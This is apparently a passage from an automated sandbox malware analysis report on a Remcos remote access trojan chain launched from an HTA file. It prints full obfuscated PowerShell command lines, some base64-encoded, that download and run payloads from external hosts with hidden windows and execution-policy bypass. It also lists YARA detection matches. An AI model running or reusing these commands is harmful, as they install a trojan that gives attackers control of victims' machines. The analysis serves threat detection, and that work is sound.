hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,13_2_004158B9
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BAA3F09_2_04BAA3F0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04BA9AB69_2_04BA9AB6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041D07113_2_0041D071
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004520D213_2_004520D2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043D09813_2_0043D098
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043715013_2_00437150
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004361AA13_2_004361AA
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0042625413_2_00426254
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043137713_2_00431377
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043651C13_2_0043651C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041E5DF13_2_0041E5DF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0044C73913_2_0044C739
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004367C613_2_004367C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_004267CB13_2_004267CB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043C9DD13_2_0043C9DD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00432A4913_2_00432A49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00436A8D13_2_00436A8D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043CC0C13_2_0043CC0C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00436D4813_2_00436D48
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00434D2213_2_00434D22
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00426E7313_2_00426E73
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00440E2013_2_00440E20
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0043CE3B13_2_0043CE3B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00412F4513_2_00412F45
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00452F0013_2_00452F00
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00426FAD13_2_00426FAD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F66 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004020E7 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004338A5 appears 41 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00433FB0 appears 55 times
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2024
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2398
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: Commandline size = 2024Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2398Jump to behavior
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 13.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000009.00000002.2047488224.0000000005CCD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 7916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: CasPol.exe PID: 5480, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winHTA@19/20@4/3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00416AB7 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,13_2_00416AB7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0040E219 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,13_2_0040E219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_0041A63F FindResourceA,LoadResource,LockResource,SizeofResource,13_2_0041A63F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,13_2_00419BC4
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\bestofthingswithentiretimegivenebstthignstodowithgreat[1].tiffJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7924:120:WilError_03
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EC111K
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7500:120:WilError_03
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0nn253iy.hoi.ps1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
                    Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaReversingLabs: Detection: 21%
                    Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
